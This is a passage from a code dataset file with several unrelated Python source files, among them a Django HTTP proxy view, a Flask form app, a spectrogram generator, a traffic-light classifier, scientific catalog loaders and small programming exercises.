re.sub(\"'\", \"\", get_flattened_transcript(vid_id))\n\tcounter = CountVectorizer(stop_words='english')\n\tdata = counter.fit_transform([transcript]).toarray()\n\twords = counter.get_feature_names()\n\tdist = np.sum(data, axis=0)\n\t\n\ttokens_json = []\t\n\tzipped = sorted(zip(dist, words), reverse=True)[:50]\n\n\ttotal = sum([x for (x,_) in zipped])\n\tfactor = 50 / total * 15\n\n\tfor count, tag in sorted(zip(dist, words), reverse=True)[:50]:\n\n\t\ttokens_json.append(\n\t\t\t{'text': tag, \n\t\t\t 'size': count * factor\n\t\t\t})\n\n\n\treturn tokens_json\n\n\nif __name__ == \"__main__\":\n\t# os.chdir(r'C:\\Users\\Maheer\\Dropbox\\Cornell Course Materials\\Spring 2015\\CS 4300\\youtube-caption-prediction')\n\t# starttime = time.time()\n\n\t# tfv = vectorize_on_training_set()\t\n\t# dummy = joblib.load('.././trained_models/dummy.pkl')\n\t# query_results = rerank_search_results(dummy, query_search('cats'), tfv)\n\t\n\t# print('Total Time Taken:' + str(time.time() - starttime))\n\n\tword_cloud = get_wordcloud('3f_h0rxhD9I')\n","sub_path":"searching_and_ml/query_and_rerank.py","file_name":"query_and_rerank.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"553801724","text":"\"\"\"\nPut your Flask app code here.\n\"\"\"\n\nfrom flask import Flask, render_template, request\napp = Flask(__name__)\n\n@app.route('/')\ndef hello():\n return 
render_template('hello.html')\n\n@app.route('/login/', methods = ['GET','POST'])\ndef login():\n    error = None\n    name = age = ninja = ''  # defaults so a plain GET request does not raise a NameError\n    if request.method == \"POST\":\n        name = request.form.get('name','')\n        age = request.form.get('age','')\n        ninja = request.form.get('ninja','')\n        if name == '' or age == '' or ninja == '':\n            error = 'Please check your input and fill in all the boxes'\n    return render_template('login.html',name=name, age=age, ninja = 'Patrick Huston',\n        error=error)\n\nif __name__ == '__main__':\n    app.debug = True\n    app.run()\n","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142338027","text":"'''\nCreated on 10 apr. 2017\n\n@author: Andrei\n'''\n\nclass JewelRepository(object):\n    '''\n    classdocs\n    '''\n\n\n    def __init__(self):\n        '''\n        Constructor\n        '''\n        self.__jewelList = []\n    \n    def createJewel(self,jewel):\n        #Descr: adds a jewel\n        #Input: a jewel\n        #Output: \n        for a in self.__jewelList:\n            if ( a.getId() == jewel.getId() ):\n                raise ValueError ( \"There is already a jewel with id \" + str( a.getId() ) )\n        self.__jewelList.append ( jewel )\n    \n    def deleteJewel(self,idJewel):\n        #Descr: deletes a jewel\n        #Input: the jewel's id\n        #Output:\n        delAct = []\n        for i in reversed(range(0,len(self.__jewelList))):\n            if self.__jewelList[i].getId()==idJewel:\n                delAct.append (i)\n        if len(delAct) > 0: \n            for delElem in delAct:\n                del self.__jewelList[delElem]\n        else:\n            raise ValueError (\"There is no jewel with id \" + str(idJewel))\n    \n    def updateJewel (self, idJewel, newJewel):\n        #Descr: updates a jewel\n        #Input: the jewel's id and the jewel that will replace it\n        #Output:\n        if(self.__jewelList != []):\n            for i in range (0, len(self.__jewelList)):\n                if (self.__jewelList[i].getId() == idJewel):\n                    self.__jewelList[i] = newJewel\n        else:\n            raise ValueError (\"There are no jewels!\")\n    \n    def searchJewel(self,jewel):\n        #Descr: searches for a jewel\n        #Input: a jewel\n        #Output: the jewel that was found\n        for a in self.__jewelList:\n            if(a.getId() == jewel.getId()):\n                return a\n        if self.__jewelList == []:\n            raise ValueError ( \"There are no jewels!\" )\n        else:\n            raise ValueError ( \"There is no jewel with this id!\" )\n    \n    def getAllJewel(self):\n        #Descr: returns all jewels\n        #Input:\n        #Output: the list of jewels\n        if len(self.__jewelList) > 0:\n            lista_activitati = self.__jewelList[:]\n            return lista_activitati\n        else:\n            raise ValueError (\"There are no jewels!\")\n    \n    def getJewel(self, idd):\n        #Descr: returns the jewel with the id given as parameter\n        #Input: idd - a jewel id\n        #Output: the jewel with id == idd\n        if(self.__jewelList != []):\n            for i in range (0, len(self.__jewelList)):\n                if (self.__jewelList[i].getId() == idd):\n                    return self.__jewelList[i]\n        else:\n            raise ValueError (\"There are no jewels!\")\n    \n    def getSize(self):\n        #Descr: returns the number of jewels\n        #Input:\n        #Output: the number of jewels\n        return len(self.__jewelList)","sub_path":"JewelRepository.py","file_name":"JewelRepository.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"417942964","text":"\n\nfrom xai.brain.wordbase.nouns._weekday import _WEEKDAY\n\n#class header\nclass _WEEKDAYS(_WEEKDAY, ):\n\tdef __init__(self,): \n\t\t_WEEKDAY.__init__(self)\n\t\tself.name = \"WEEKDAYS\"\n\t\tself.specie = 
'nouns'\n\tself.basic = \"weekday\"\n\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_weekdays.py","file_name":"_weekdays.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"55560535","text":"#!/usr/bin/env python3\n# coding: utf-8\n\ndef solve(n, m):\n    if n < m:\n        if m % n == 0:\n            return 'factor'\n    elif n > m:\n        if n % m == 0:\n            return 'multiple'\n    return 'neither'\n\n\ndef main():\n    while True:\n        n, m = map(int, input().split())\n        if n + m == 0:\n            return\n        print(solve(n, m))\n\n\nif __name__ == '__main__':\n    main()\n\n","sub_path":"Python/SEOKCHAN/수학3/1.배수와약수.py","file_name":"1.배수와약수.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142119651","text":"from tkapi.besluit import Besluit\n\nfrom .core import TKApiTestCase\n\n\nclass TestBesluit(TKApiTestCase):\n\n    def test_get_besluiten(self):\n        n_items = 5\n        besluit_filter = Besluit.create_filter()\n        besluit_filter.filter_non_empty_zaak()\n        besluiten = self.api.get_besluiten(filter=besluit_filter, max_items=n_items)\n        for besluit in besluiten:\n            self.assertEqual(1, len(besluit.zaken))\n            self.assertIsNotNone(besluit.agendapunt.activiteit.begin)\n        self.assertEqual(n_items, len(besluiten))\n\n\nclass TestBesluitFilters(TKApiTestCase):\n\n    def test_kamerstukdossier_filter(self):\n        n_items = 4\n        vetnummer = 34822\n        filter = Besluit.create_filter()\n        filter.filter_kamerstukdossier(vetnummer=vetnummer)\n        besluiten = self.api.get_besluiten(filter=filter, max_items=n_items)\n        self.assertEqual(n_items, len(besluiten))\n        for besluit in besluiten:\n            self.assertEqual(vetnummer, besluit.zaak.dossier.vetnummer)\n\n    def test_kamerstuk_filter(self):\n        n_items = 5\n        vetnummer = 33885\n        volgnummer = 16\n        filter = Besluit.create_filter()\n        filter.filter_kamerstuk(vetnummer=vetnummer, ondernummer=volgnummer)\n        besluiten = self.api.get_besluiten(filter=filter, max_items=n_items)\n        self.assertEqual(1, len(besluiten))\n        for besluit in besluiten:\n            self.assertEqual(vetnummer, besluit.zaken[0].dossier.vetnummer)\n","sub_path":"tests/test_besluit.py","file_name":"test_besluit.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"179836718","text":"# -*- coding: utf-8 -*-\n# from https://github.com/yvandermeer/django-http-proxy\n#\n# License found in setup.py https://github.com/yvandermeer/django-http-proxy/blob/develop/setup.py\n# 'License :: OSI Approved :: MIT License'\n#\n# Authors in https://github.com/yvandermeer/django-http-proxy/blob/develop/AUTHORS\n# The Django HTTP Proxy is developed and maintained by Yuri van der Meer.\n# Many thanks to Will Larson for providing the inspiration and original source\n# code for this app:\n# http://lethain.com/entry/2008/sep/30/suffer-less-by-using-django-dev-server-as-a-proxy/\n#\n\nimport logging\nimport re\n\nfrom django.http import HttpResponse\nfrom django.utils.six.moves import urllib\nfrom django.views.generic import View\n\nlogger = logging.getLogger(__name__)\n\nREWRITE_REGEX = re.compile(r'((?:src|action|href)=[\"\\'])/(?!\\/)')\n\n\nclass HttpProxy(View):\n    \"\"\"\n    Class-based view to configure Django HTTP Proxy for a URL pattern.\n\n    In its most basic usage::\n\n        from httpproxy.views import HttpProxy\n\n        urlpatterns += patterns('',\n            (r'^my-proxy/(?P<url>.*)$',\n                
HttpProxy.as_view(base_url='http://python.org/')),\n        )\n\n    Using the above configuration (and assuming your Django project is served by\n    the Django development server on port 8000), a request to\n    ``http://localhost:8000/my-proxy/index.html`` is proxied to\n    ``http://python.org/index.html``.\n    \"\"\"\n\n    base_url = None\n    \"\"\"\n    The base URL that the proxy should forward requests to.\n    \"\"\"\n\n    rewrite = False\n    \"\"\"\n    If you configure the HttpProxy view on any non-root URL, the proxied\n    responses may still contain references to resources as if they were served\n    at the root. By setting this attribute to ``True``, the response will be\n    :meth:`rewritten <httpproxy.views.HttpProxy.rewrite_response>` to try to\n    fix the paths.\n    \"\"\"\n\n    _msg = 'Response body: \\n%s'\n\n    def dispatch(self, request, url, *args, **kwargs):\n        # print('URL0: {}'.format(url))\n        self.url = url\n        self.original_request_path = request.path\n        request = self.normalize_request(request)\n\n        response = super(HttpProxy, self).dispatch(request, *args, **kwargs)\n\n        if self.rewrite:\n            response = self.rewrite_response(request, response)\n        return response\n\n    def normalize_request(self, request):\n        \"\"\"\n        Updates all path-related info in the original request object with the\n        url given to the proxy.\n\n        This way, any further processing of the proxy'd request can just ignore\n        the url given to the proxy and use request.path safely instead.\n        \"\"\"\n        # if not self.url.startswith('/'):\n        #     self.url = '/' + self.url\n        request.path = self.url\n        request.path_info = self.url\n        request.META['PATH_INFO'] = self.url\n        return request\n\n    def rewrite_response(self, request, response):\n        \"\"\"\n        Rewrites the response to fix references to resources loaded from HTML\n        files (images, etc.).\n\n        .. note::\n            The rewrite logic uses a fairly simple regular expression to look for\n            \"src\", \"href\" and \"action\" attributes with a value starting with \"/\"\n            – your results may vary.\n        \"\"\"\n        proxy_root = self.original_request_path.rsplit(request.path, 1)[0]\n        response.content = REWRITE_REGEX.sub(r'\\1{}/'.format(proxy_root),\n                                             response.content)\n        return response\n\n    def get(self, *args, **kwargs):\n        return self.get_response()\n\n    def post(self, request, *args, **kwargs):\n        headers = {}\n        if request.META.get('CONTENT_TYPE'):\n            headers['Content-type'] = request.META.get('CONTENT_TYPE')\n        return self.get_response(body=request.body, headers=headers)\n\n    def get_full_url(self, url):\n        \"\"\"\n        Constructs the full URL to be requested.\n        \"\"\"\n        param_str = self.request.GET.urlencode()\n        request_url = u'%s%s' % (self.base_url, url)\n        request_url += '?%s' % param_str if param_str else ''\n        return request_url\n\n    def create_request(self, url, body=None, headers={}):\n        request = urllib.request.Request(url, body, headers)\n        logger.info('%s %s' % (request.get_method(), request.get_full_url()))\n        return request\n\n    def get_response(self, body=None, headers={}):\n        request_url = self.get_full_url(self.url)\n        request = self.create_request(request_url, body=body, headers=headers)\n        response = urllib.request.urlopen(request, timeout=12)\n        try:\n            response_body = response.read()\n            status = response.getcode()\n            logger.debug(self._msg % response_body)\n        except urllib.error.HTTPError as e:\n            response_body = e.read()\n            logger.error(self._msg % response_body)\n            status = e.code\n        return HttpResponse(\n            response_body,\n            status=status,\n            content_type=response.headers['content-type'])\n\n\nclass HttpProxyBasicAuth(HttpProxy):\n    username = None\n    password = None\n\n    def get_response(self, body=None, 
headers={}):\n # print('URL: {}'.format(self.url))\n request_url = self.get_full_url(self.url)\n request = self.create_request(request_url, body=body, headers=headers)\n\n passman = urllib.request.HTTPPasswordMgrWithDefaultRealm()\n passman.add_password(None, request_url, self.username, self.password)\n authhandler = urllib.request.HTTPBasicAuthHandler(passman)\n opener = urllib.request.build_opener(authhandler)\n\n response = opener.open(request)\n try:\n response_body = response.read()\n status = response.getcode()\n logger.debug(self._msg % response_body)\n except urllib.error.HTTPError as e:\n response_body = e.read()\n logger.error(self._msg % response_body)\n status = e.code\n return HttpResponse(\n response_body,\n status=status,\n content_type=response.headers['content-type'])\n","sub_path":"webservice/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"122416917","text":"# Escreva um programa que leia números inteiros do teclado.\r\n# O programa deve ler os números até que o usuário digite 0 (zero).\r\n# No final da execução, exiba a quantidade de números digitados, assim como a soma e a média aritmética.\r\n\r\nsoma = 0\r\nindice = 0\r\nwhile True:\r\n n = int(input(\"Digite um número (0 para finalizar): \\n\"))\r\n if (n == 0):\r\n break\r\n soma = soma + n\r\n indice = indice + 1\r\nprint(\"A soma é: %d\" %(soma))\r\nprint(\"Média é: %d\" %(soma / indice))\r\n","sub_path":"livro-python-nilo-ney-coutinho-menezes/5_Repeticoes/5.14.py","file_name":"5.14.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"590436756","text":"import cv2\nimport numpy as np\n\nimg = cv2.imread('Parking.jpg')\nhsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\n#BGR\nlow_1 = np.array([0, 0, 20])\nhigh_1 = np.array([180, 110, 80])\n\nlow_2 = np.array([170, 150, 140])\nhigh_2 = np.array([180, 200, 180])\n\nlow_3 = np.array([30, 200, 120])\nhigh_3 = np.array([36, 255, 170])\n\nlow_4 = np.array([70, 140, 100])\nhigh_4 = np.array([90, 230, 125])\n\nn = input(\"Parking Num:\")\n\nif n == '1':\n mask_1 = cv2.inRange(hsv, low_1, high_1)\n cv2.imshow('1', ~mask_1)\n\nif n == '2':\n mask_2 = cv2.inRange(hsv, low_2, high_2)\n cv2.imshow('2', ~mask_2)\n\nif n == '3':\n mask_3 = cv2.inRange(hsv, low_3, high_3)\n cv2.imshow('3', ~mask_3)\n\nif n == '4':\n mask_4 = cv2.inRange(hsv, low_4, high_4)\n cv2.imshow('4', ~mask_4)\n\nif cv2.waitKey(0) == 27:\n cv2.destroyAllWindows()\n","sub_path":"Colour-Detect.py","file_name":"Colour-Detect.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"188392101","text":"\"\"\"@file lsst.io.py\nContains functions to interact with the General Catalog Reader\n\"\"\"\nfrom collections.abc import Sequence\nimport os\nimport numpy as np\nfrom ..gcdata import GCData\nfrom ..galaxycluster import GalaxyCluster\nfrom ..modeling import get_reduced_shear_from_convergence\n\n\ndef load_GCR_catalog(catalog_name):\n \"\"\"Loads a catalog from GCRCatalogs\"\"\"\n import GCRCatalogs\n return GCRCatalogs.load_catalog(catalog_name)\n\n\nclass _test_catalog():\n \"\"\"Blank test catalog designed to mimic a GCRCatalogs catalog. 
For testing only.\"\"\"\n\n def __init__(self, n=10):\n self.n = n\n\n def __len__(self):\n return self.n\n\n def get_quantities(self, quantities, *args, **kwargs):\n out_dict = {}\n for q in quantities:\n if q == 'galaxy_id':\n out_dict[q] = np.arange(self.n)\n else:\n out_dict[q] = np.arange(0, 1, 1./self.n)\n return out_dict\n\n\ndef _make_GCR_filter(filter_name, low_bound, high_bound):\n \"\"\"Create a filter for a specified range of a certain quantity in the GCRCatalogs format.\n\n Parameters\n ----------\n filter_name: str\n Quantity to filter\n low_bound, high_bound: float\n Range of values that the quantity is restricted to\n \"\"\"\n # checking filter_name type\n if not isinstance(filter_name, str):\n raise TypeError('filter_name not string.')\n # checking for valid filter\n if low_bound >= high_bound:\n raise ValueError('Invalid range: [%d, %d]'%(low_bound, high_bound))\n\n return ['%s >= %d'%(filter_name, low_bound),\n '%s < %d'%(filter_name, high_bound)]\n\n\ndef load_from_dc2(nclusters, catalog_name, save_dir, ra_range=(-0.3, 0.3), dec_range=(-0.3, 0.3),\n z_range=(0.1, 1.5), verbose=False, _reader='GCR'):\n \"\"\"Load random clusters from DC2 using GCRCatalogs\n\n This function saves a set of random clusters loaded from a DC2 catalog. The galaxies\n selected for each cluster are cut within a rectangular projected region around the true\n cluster center. The parameters for this cut are specified by the ra_range, dec_range,\n and z_range arguments.\n\n Parameters\n ----------\n nclusters: int\n Number of clusters to load and save.\n catalog_name: str\n Name of catalog (without '.yaml')\n save_dir: str\n Path to directory in which to save cluster objects\n ra_range: length-2 array-like of floats, optional\n Range of right ascension values (in degrees) to cut galaxies relative to the cluster center\n dec_range: length-2 array-like of floats, optional\n Range of declination values (in degrees)to cut galaxies relative to the cluster center\n z_range: length-2 array-like of floats, optional\n Range of redshift values to cut galaxies relative to the cluster center\n verbose: bool\n Sets the function to print the id of each cluster while loading\n _reader: str\n Reader argument used for testing. 
In practice, this should be left at the default 'GCR'.\n    \"\"\"\n    # check that ranges are length-2\n    if len(ra_range)!=2:\n        raise ValueError('ra_range incorrect length: %i'%len(ra_range))\n    if len(dec_range)!=2:\n        raise ValueError('dec_range incorrect length: %i'%len(dec_range))\n    if len(z_range)!=2:\n        raise ValueError('z_range incorrect length: %i'%len(z_range))\n\n    # load catalog\n    if _reader=='GCR':\n        catalog = load_GCR_catalog(catalog_name)\n    elif _reader=='test':\n        catalog = _test_catalog(10)\n    else:\n        raise ValueError('Invalid reader name: %s'%_reader)\n\n    # check range of nclusters\n    if (nclusters<=0) | (nclusters>len(catalog)):\n        raise ValueError('nclusters value out of range: %i'%nclusters)\n\n    halos = catalog.get_quantities(['galaxy_id', 'halo_mass', 'redshift', 'ra', 'dec'],\n                                   filters=['halo_mass > 1e14', 'is_central==True'])\n\n    # generate GalaxyCluster objects\n    for i in np.random.choice(range(len(halos['galaxy_id'])), nclusters, replace=False):\n        # specify cluster information\n        cl_id = halos['galaxy_id'][i]\n        cl_ra = halos['ra'][i]\n        cl_dec = halos['dec'][i]\n        cl_z = halos['redshift'][i]\n\n        if verbose:\n            print(f'Loading cluster {cl_id}')\n\n        # get galaxies around cluster\n\n        filters = (_make_GCR_filter('ra', cl_ra+ra_range[0], cl_ra+ra_range[1])+\n                   _make_GCR_filter('dec', cl_dec+dec_range[0], cl_dec+dec_range[1])+\n                   _make_GCR_filter('redshift', cl_z+z_range[0], cl_z+z_range[1]))\n\n        gals = catalog.get_quantities(['galaxy_id', 'ra', 'dec',\n                                       'shear_1', 'shear_2',\n                                       'redshift', 'convergence'],\n                                      filters=filters)\n\n        # calculate reduced shear\n        g1 = get_reduced_shear_from_convergence(gals['shear_1'], gals['convergence'])\n        g2 = get_reduced_shear_from_convergence(gals['shear_2'], gals['convergence'])\n\n        # store the results into a GCData\n        t = GCData([gals['galaxy_id'], gals['ra'], gals['dec'],\n                    2*g1, 2*g2,\n                    gals['redshift'], gals['convergence']],\n                   names=('galaxy_id', 'ra', 'dec', 'e1', 'e2', 'z', 'kappa'))\n\n        # save as GalaxyCluster object\n        c = GalaxyCluster(unique_id=int(cl_id), ra=cl_ra, dec=cl_dec, z=cl_z,\n                          galcat=t)\n\n        c.save(os.path.join(save_dir, '%i.p'%cl_id))\n","sub_path":"clmm/lsst/load_clusters_with_gcr.py","file_name":"load_clusters_with_gcr.py","file_ext":"py","file_size_in_byte":5504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"211252347","text":"\"\"\"\nVery simple HTTP server serving as a wrapper for the WCRFT2 CLI.\nHandles a multipart POST request with a premorph file under the \"file\" name, returning the tagged file in ccl format.\nUsage::\n    ./wcrft2_server.py [<port>]\n\n    curl --form file=@path/to/file http://localhost:<port> > output.ccl\n\"\"\"\nimport sys\nimport cgi\nfrom subprocess import Popen, PIPE\n\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\n\nclass WCRFT2HTTPHandler(BaseHTTPRequestHandler):\n    def _set_headers(self):\n        self.send_response(200)\n        self.send_header('Content-type', 'text/html; charset=utf-8')\n        self.end_headers()\n\n    def do_POST(self):\n        self._set_headers()\n        form = cgi.FieldStorage(\n            fp=self.rfile,\n            headers=self.headers,\n            environ={'REQUEST_METHOD': 'POST'}\n        )\n        cmd = ['wcrft-app', 'nkjp_e2', '-i', 'premorph', '-o', 'ccl', '-']\n        p = Popen(cmd, stdout=PIPE, stdin=PIPE, stderr=PIPE)\n        stdin_data = form.getvalue(\"file\")\n        stdout_data = p.communicate(input=stdin_data)[0]\n        self.wfile.write(stdout_data.strip())\n\n\ndef run(server_class=HTTPServer, handler_class=WCRFT2HTTPHandler, port=8088):\n    server_address = ('', port)\n    httpd = server_class(server_address, handler_class)\n    print('Server 
running at localhost:{} ...'.format(port))\n httpd.serve_forever()\n\nif __name__ == \"__main__\":\n port = int(sys.argv[1]) if len(sys.argv) >= 2 else 8088\n run(port=port)\n","sub_path":"wcrft2_server.py","file_name":"wcrft2_server.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"391170331","text":"import matplotlib.pyplot as plot\n\nfrom pydub import AudioSegment\nimport numpy as np\nimport librosa\nimport librosa.display as display\n\nfrom .image_changing import (\n crop_image,\n convert_png_to_grayscale,\n create_bmp_from_grayscale\n)\n\nimport os\nimport sys\n\nfrom cfg_load.config import (\n SOURCE,\n PROJECT_DIR,\n TMP,\n DATA\n)\n\nmy_dpi = 96\n\n\ndef convert_file(file):\n file_segment = AudioSegment.from_mp3(file)\n save_path = os.path.join(PROJECT_DIR, '{0}/{1}'.format(SOURCE, TMP))\n new_file_name = file.replace('.mp3', '.wav').split('/')[-1]\n try:\n file_segment.export(os.path.join(save_path, new_file_name), format='wav')\n except Exception as ex:\n raise ex\n else:\n return save_path, new_file_name\n\n\ndef check_file_extension(file_name):\n extension = str(file_name).split('.')[1]\n if extension == 'wav':\n return True\n return False\n\n\ndef draw_spectrogram(signal_data):\n fig = plot.figure(figsize=(signal_data.shape[1] / 100, signal_data.shape[0] / 100))\n plot.axis('off')\n fig.legend('off')\n fig.tight_layout(pad=0)\n display.specshow(librosa.amplitude_to_db(signal_data, ref=np.max), y_axis='log', x_axis='time')\n return fig\n\n\ndef create_spectrogram(file, save_dir=DATA, mode='clear'):\n need_cleaning = False\n file_name = file.split('/')[-1]\n try:\n if not check_file_extension(file):\n need_cleaning = True\n path, file_name = convert_file(file)\n file = os.path.join(path, file_name)\n except Exception as ex:\n print(ex)\n return False\n else:\n audio_data, sample_rate = librosa.load(file)\n D = np.abs(librosa.stft(audio_data, n_fft=1024, hop_length=256, win_length=1024))\n fig = draw_spectrogram(D)\n save_directory = os.path.join(PROJECT_DIR, '{0}/{1}'.format(SOURCE, save_dir))\n if mode == 'clear':\n spectrogram_path = os.path.join(PROJECT_DIR, '{0}/{1}/{2}'.format(SOURCE, TMP,\n file_name.replace('.wav', '.png')))\n fig.savefig(spectrogram_path)\n picture_arr = crop_image(spectrogram_path)\n for picture in picture_arr:\n create_bmp_from_grayscale(convert_png_to_grayscale(picture), save_directory)\n os.remove(spectrogram_path)\n else:\n spectrogram_path = os.path.join(PROJECT_DIR, '{0}/{1}/{2}'.format(SOURCE, save_dir,\n file_name.replace('.wav', '.png')))\n fig.savefig(spectrogram_path)\n crop_image(spectrogram_path)\n os.remove(spectrogram_path)\n if need_cleaning:\n os.remove(os.path.join(PROJECT_DIR, '{0}/{1}/{2}'.format(SOURCE, TMP, file_name)))\n return True\n\n\nif __name__ == '__main__':\n print(sys.argv[1])\n print(PROJECT_DIR)\n create_spectrogram(sys.argv[1])","sub_path":"SoundController/Spectrogram/create_spectrogram.py","file_name":"create_spectrogram.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"381298022","text":"# -*- coding:UTF-8 -*-\nimport tensorflow as tf\nimport os\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"]='3'\n#创建两个常量Tensor constant\nconst1 = tf.constant([[2,2]])\nconst2 = tf.constant([[4],[4]])\n#张量相乘\nmultiply = tf.matmul(const1,const2)\nprint(\"sess.run()之前,尝试输出multiply的值:{}\".format(multiply))\n\n#第一种创建session对象\nsess = 
tf.Session()\n#用session的run方法来实际运行multiply这个矩阵乘法操作\n#并且执行的结果赋值给result\nresult = sess.run(multiply)\n#打印结果\nprint(\"sess.run()后,输出multiply:{}\".format(result))\n#关闭session对话\nsess.close()\n\n\n#第二种方法来创建和关闭Session\n#用到了上下文管理器\nwith tf.Session() as sess:\n\tresult2 = sess.run(multiply)\n\tprint(\"结果是{}\".format(result2))","sub_path":"day01/code01.py","file_name":"code01.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"115744746","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\ndef gradingStudents(grades):\n new = []\n for i in range (len(grades)):\n if grades[i] <= 37:\n new.append(grades[i])\n elif ((((grades[i]//5)*5)+5)-grades[i]) < 3:\n new.append((((grades[i]//5)*5)+5))\n else:\n new.append(grades[i])\n return new\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n grades_count = int(input().strip())\n\n grades = []\n\n for _ in range(grades_count):\n grades.append(int(input().strip()))\n\n result = gradingStudents(grades)\n\n fptr.write('\\n'.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","sub_path":"Grading_Students.py","file_name":"Grading_Students.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"300306834","text":"\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\n\n\nif __name__ == \"__main__\":\n \n base = './data/res/k'\n l2 = []\n l4 = []\n l6 = []\n l8 = []\n for l_div in range(2,11,1):\n direc2 = base+str(l_div)+'l2.npy'\n l2.append(list(np.load(direc2))[1][0])\n for l_div in range(4,11,1):\n direc4 = base+str(l_div)+'l4.npy'\n l4.append(list(np.load(direc4))[1][0])\n for l_div in range(6,11,1):\n direc6 = base+str(l_div)+'l6.npy'\n l6.append(list(np.load(direc6))[1][0])\n for l_div in range(8,11,1):\n direc8 = base+str(l_div)+'l8.npy'\n l8.append(list(np.load(direc8))[1][0])\n \n \n l1, = plt.plot(range(2,11,1),l2,'b.-')\n l2, = plt.plot(range(4,11,1),l4,'r.-')\n l3, = plt.plot(range(6,11,1),l6,'g.-')\n l4, = plt.plot(range(8,11,1),l8,'c.-')\n# l5, = plt.plot([16,32,64],l[2],'c>-')\n \n \n \n \n new_ticks = np.linspace(2, 11, 10)\n plt.xticks(new_ticks)\n# \n# l3, = plt.plot(range(2,7,1),l[0],'b.-')\n# l4, = plt.plot(range(3,7,1),l[1],'ro-')\n# l5, = plt.plot(range(4,7,1),l[2],'c>-')\n# l6, = plt.plot(range(6,11,1),l[3],'m,-')\n# l7, = plt.plot(range(7,11,1),l[4],'k*-')\n \n plt.legend(handles = [l1,l2,l3,l4,], labels = ['l=2','l=4','l=6','l=8',], loc = 'best')\n plt.xlabel('k')\n plt.ylabel('Average of Position Loss [Km^2]')\n \n plt.savefig('test_loc.png',dpi=500)\n","sub_path":"code/plt_loc.py","file_name":"plt_loc.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"223075616","text":"import requests\nfrom urllib.parse import quote\n\nlua = '''\nfunction main(splash)\n return \"世界,你好\"\nend\n'''\n\nurl = 'http://localhost:8050/execute?lua_source=' + quote(lua)\nresponse = requests.get(url)\nprint(response.text)\n\nlua = '''\nfunction main(splash)\n splash:go(\"https://weather.com\")\n splash:wait(3)\n return {\n html = splash:html(),\n png = splash:png()\n \n }\nend\n\n'''\nurl = 'http://localhost:8050/execute?lua_source=' + quote(lua)\nresponse = requests.get(url)\nimport json\nimport base64\njson_obj = json.loads(response.text)\npng_base64 = json_obj['png']\npng_bytes = 
base64.b64decode(png_base64)\n\nwith open('weather.png','wb') as f:\n f.write(png_bytes)\n","sub_path":"splash/execute.py","file_name":"execute.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"135147173","text":"from styx_msgs.msg import TrafficLight\nimport cv2\nimport numpy as np\nfrom keras.models import model_from_json\nimport rospy\nimport os\nimport tensorflow\n\n\nclass TLClassifier(object):\n def __init__(self):\n with open('model.json', 'r') as jfile:\n self.model = model_from_json(jfile.read())\n self.model.load_weights('model.h5', by_name=True)\n self.model._make_predict_function()\n self.graph = tensorflow.get_default_graph()\n\n def get_classification(self, image):\n \"\"\"Determines the color of the traffic light in the image\n Args:\n image (cv::Mat): image containing the traffic light\n Returns:\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n \"\"\"\n\n resize_image = cv2.resize(image, (160, 80))\n hls_image = cv2.cvtColor(resize_image, cv2.COLOR_BGR2HLS)\n processed_image = (hls_image.astype(np.float32) / 255.0) + 0.01\n final_4d = np.expand_dims(processed_image, axis=0)\n\n network_label = self.model.predict_classes(final_4d)[0][0]\n\n\n # rospy.logwarn(a)\n # if network_label == 1:\n # return 1\n # else:\n # return 0\n\n rospy.logwarn(network_label)\n if network_label >= 1:\n return TrafficLight.GREEN\n else:\n return TrafficLight.RED\n","sub_path":"ros/src/tl_detector/light_classification/tl_classifier.py","file_name":"tl_classifier.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"98767703","text":"import logging\nimport os.path\nimport sys\nfrom gensim.corpora import WikiCorpus\n\nif __name__ == 